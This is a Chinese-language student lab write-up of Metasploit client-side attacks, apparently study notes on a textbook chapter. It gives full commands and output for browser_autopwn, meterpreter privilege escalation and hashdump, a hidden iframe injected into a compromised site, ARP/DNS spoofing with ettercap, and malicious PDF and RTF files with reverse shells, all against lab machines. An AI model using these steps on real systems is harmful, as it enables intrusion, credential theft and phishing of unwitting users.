MasterMsf 7 客户端渗透
启程
“我明白你会来,所以我等。”
I am good at reading people. My secret, I look for worst in them.
本章将研究实践对浏览器等客户端的攻击。
浏览器渗透
Browser Autopwn
这是Metasploit中的一个模块,它对各种浏览器进行自动化攻击。其工作流程是:加载所有浏览器渗透模块并处于监听状态,同时开启不同平台的反向shell监听。接着等待浏览器连接,然后根据浏览器版本信息发送对应的攻击向量,图示如下:
下面我们对Win2K上的IE 6进行测试。仔细观察模块的加载和启动过程:
msf > use auxiliary/server/browser_autopwn
msf auxiliary(server/browser_autopwn) > set LHOST 172.16.56.1
LHOST => 172.16.56.1
msf auxiliary(server/browser_autopwn) > set SRVPORT 8080
SRVPORT => 8080
# / 表示根目录,即各种渗透模块都使用
msf auxiliary(server/browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 0.
[*] Setup
msf auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 172.16.56.1...
[*] ---
# 启动各种攻击向量
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lHmin
[*] Local IP: http://192.168.1.101:8080/lHmin
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kINjsZQVDtv
[*] Local IP: http://192.168.1.101:8080/kINjsZQVDtv
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/wNShgBZlWcq
[*] Local IP: http://192.168.1.101:8080/wNShgBZlWcq
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/HorQWCGJmHlI
[*] Local IP: http://192.168.1.101:8080/HorQWCGJmHlI
[*] Server started.
# ... 省去了很多内容,后面会用jobs以列表展示
# 开启监听反向shell
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 172.16.56.1:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 172.16.56.1:6666
[*] Started reverse TCP handler on 172.16.56.1:7777
[*] --- Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
至此,browser_autopwn启动完毕。我们可以用jobs看一下后台任务:
msf auxiliary(server/browser_autopwn) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: server/browser_autopwn
1 Exploit: android/browser/webview_addjavascriptinterface android/meterpreter/reverse_tcp tcp://172.16.56.1:8888
2 Exploit: multi/browser/firefox_proto_crmfrequest generic/shell_reverse_tcp tcp://172.16.56.1:6666
3 Exploit: multi/browser/firefox_tostring_console_injection generic/shell_reverse_tcp tcp://172.16.56.1:6666
4 Exploit: multi/browser/firefox_webidl_injection generic/shell_reverse_tcp tcp://172.16.56.1:6666
5 Exploit: multi/browser/java_atomicreferencearray java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
6 Exploit: multi/browser/java_jre17_jmxbean java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
7 Exploit: multi/browser/java_jre17_provider_skeleton java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
8 Exploit: multi/browser/java_jre17_reflection_types java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
9 Exploit: multi/browser/java_rhino java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
10 Exploit: multi/browser/java_verifier_field_access java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
11 Exploit: multi/browser/opera_configoverwrite generic/shell_reverse_tcp tcp://172.16.56.1:6666
12 Exploit: windows/browser/adobe_flash_mp4_cprt windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
13 Exploit: windows/browser/adobe_flash_rtmp windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
14 Exploit: windows/browser/ie_cgenericelement_uaf windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
15 Exploit: windows/browser/ie_createobject windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
16 Exploit: windows/browser/ie_execcommand_uaf windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
17 Exploit: windows/browser/mozilla_nstreerange windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
18 Exploit: windows/browser/ms13_080_cdisplaypointer windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
19 Exploit: windows/browser/ms13_090_cardspacesigninhelper windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
20 Exploit: windows/browser/msxml_get_definition_code_exec windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
21 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://172.16.56.1:3333
22 Exploit: multi/handler generic/shell_reverse_tcp tcp://172.16.56.1:6666
23 Exploit: multi/handler java/meterpreter/reverse_tcp tcp://172.16.56.1:7777
感觉还是蛮壮观的。下面我们用IE 6去访问http://172.16.56.1:8080:
[*] Handling '/'
[*] Handling '/?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDA6emgtY246eDg2Ok1TSUU6Ni4wOg%3d%3d'
[*] JavaScript Report: Windows XP:undefined:undefined:undefined:SP0:zh-cn:x86:MSIE:6.0:
[*] Reporting: {"os.product"=>"Windows XP", "os.version"=>"SP0", "os.language"=>"zh-cn", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] Responding with 14 exploits
# ...
[*] 172.16.56.152 ie_createobject - Sending exploit HTML...
[*] 172.16.56.152 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
# ...
[*] 172.16.56.152 java_verifier_field_access - Generated jar to drop (5308 bytes).
[*] 172.16.56.152 ie_createobject - Sending EXE payload
[*] Sending stage (179779 bytes) to 172.16.56.152
[*] Meterpreter session 1 opened (172.16.56.1:3333 -> 172.16.56.152:1124) at 2018-10-30 12:48:34 +0800
# ...
[*] Meterpreter session 2 opened (172.16.56.1:3333 -> 172.16.56.152:1126) at 2018-10-30 12:48:34 +0800
[*] Session ID 1 (172.16.56.1:3333 -> 172.16.56.152:1124) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Session ID 2 (172.16.56.1:3333 -> 172.16.56.152:1126) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: iuxWclhTGmmDzKjeaH.exe (540)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 956
[*] Current server process: GAasDKFKpT.exe (1488)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1600
[+] Successfully migrated to process
[+] Successfully migrated to process
我们已经获得了两个会话:
msf auxiliary(server/browser_autopwn) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows XXX-91962AAC0C1\xxx @ XXX-91962AAC0C1 172.16.56.1:3333 -> 172.16.56.152:1124 (172.16.56.152)
2 meterpreter x86/windows XXX-91962AAC0C1\xxx @ XXX-91962AAC0C1 172.16.56.1:3333 -> 172.16.56.152:1126 (172.16.56.152)
# first
msf auxiliary(server/browser_autopwn) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: XXX-91962AAC0C1\xxx
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# second
msf auxiliary(server/browser_autopwn) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: XXX-91962AAC0C1\xxx
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 959fbd30b1cc734cc231a901c250a078...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:xxxxx:xxxxx:::
Guest:501:xxxxx:xxxxx:::
xxx:1000:xxxxx:xxxxx:::
这个有点酷炫啊,有点像电影里演的那样。
水坑攻击
本节实验是上一节的延伸,攻击者先攻陷一个服务器,然后在服务器的网页中注入指向属于攻击者的Browser AUtopwn服务器的恶意iFrame。当别的客户机访问被感染服务器后,他的浏览器将被渗透。这就是我们说的“水坑攻击”。其流程如下:
我们建立实验环境如下:
Browser Autopwn Server: 172.16.56.1
URL: http://172.16.56.1:8080
Vulnerable Server: 172.16.56.130 (Metasploitable2)
URL: http://172.16.56.130
Guest of Metasploitable2: 172.16.56.152
在一切开始前,Guest访问Metasploitable2情况如下:
确保browser_autopwn处于启动状态,然后攻陷服务器(第一章的过程)。之后修改其网站上的index.php文件。先下载下来:
meterpreter > cd /var/www/
meterpreter > download ./index.php
[*] Downloading: ./index.php -> index.php
[*] Downloaded 891.00 B of 891.00 B (100.0%): ./index.php -> index.php
[*] download : ./index.php -> index.php
然后添加恶意iframe:
<iframe src="http://172.16.56.1:8080/" width=0 height=0 styple="hidden"
frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
再上传上去:
meterpreter > mv ./index.php ./index.php.bak
meterpreter > upload index.php ./
[*] uploading : index.php -> ./
[*] uploaded : index.php -> .//index.php
#别忘记改权限,否则浏览器无法访问
meterpreter > chmod 644 index.php
之后,Guest去访问服务器网站,依然是原样:
但是如果他查看源文件,就会发现不对劲:
而此时,攻击者已经获得他的shell了:
(是最后两个。前两个是攻陷服务器时得到的。)
与DNS劫持一起享用
本节实验如下:
- 范围:局域网内
- 内容:对目标实施ARP攻击及DNS劫持,从而将其经常访问的URL重定向为我们的browser_autopwn服务器,然后由browser_autopwn渗透
- 攻击者:Kali 172.16.56.200
- Browser Autopwn服务器:172.16.56.1
- 靶机:Win2K 172.16.56.152
首先在配置文件中添加要劫持的URL:
# add entry in /etc/ettercap/etter.dns
www.4399.com A 172.16.56.1
然后启动ettercap:
ettercap -G
选择监听网卡:
然后在Hosts中选择扫描:
在Hosts中选择主机列表:
我们将靶机.152添加到目标1,将网关172.16.56.2添加到目标2:
然后选择中间人攻击的ARP投毒:
勾选嗅探远程连接选项。然后选择开始嗅探。接着点击插件、插件管理,双击激活dns_spoof:
确保browser_autopwn服务器已经上线,万事俱备。受害者尝试打开http://www.4399.com:
观察ettercap的日志如下:
browser_autopwn服务器这边已经能够已经getshell了:
基于各种文件格式渗透
最近美国披露的朝鲜黑客,其使用的“鱼叉攻击”就是借助E-mail发送恶意文件,从而感染索尼员工的电脑。我们来来看看这种攻击方式。
漏洞是CVE-2010-2883,具体的分析工作在读完《0day安全》后跟随《漏洞战争》的学习进行,本次仅仅做漏洞复现实验。
OS: Windows 7 32-bit
Adobe Reader: 9.3
首先生成一个恶意pdf:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(windows/fileformat/adobe_cooltype_sing) > show options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.56.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
注意我们用了反向shell,这是因为在现实中我们不知道受害者什么时候会打开pdf。
然后设置监听,当目标打开文件后我们将获得shell:
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.16.56.1:4444
[*] Sending stage (179779 bytes) to 172.16.56.159
[*] Meterpreter session 1 opened (172.16.56.1:4444 -> 172.16.56.159:49169) at 2018-10-30 15:30:24 +0800
meterpreter > getuid
Server username: WIN-J7CB6NT7B29\rambo
meterpreter > sysinfo
Computer : WIN-J7CB6NT7B29
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
不过,对方的Adobe可能会卡死。这时候目标很可能会强制结束,所以在成功获得shell后最好赶快migrate:
Word
漏洞是MS10_087。同样地,我们这里先不去分析其原理。
OS: Windows 7 32-bit
Office: Standard 2007
利用过程与上面的十分类似,都是生成恶意文件:
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show options
Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.56.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
同样开启监听:
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.16.56.1:4444
[*] Sending stage (179779 bytes) to 172.16.56.159
[*] Meterpreter session 2 opened (172.16.56.1:4444 -> 172.16.56.159:49180) at 2018-10-30 15:43:49 +0800
meterpreter > getuid
Server username: WIN-J7CB6NT7B29\rambo
同样卡死(hahahaha):
总结
这一章让人很开眼界——攻击方式真的是多种多样。
就这样,又结束了一章。大学的最后一年,日子如流水般一天天过去。那么,就这样坚持和努力吧。
There are always some people and ideals, for whom and which we strive, endure and persist when isolated. That’s why we struggle to our feet and refuse to give up.
Also, der Traum ist ein Stern im Himmel. Das weiß ich schon. Ich will mich bemühen, ihn zu erfüllen.
Viel Glück!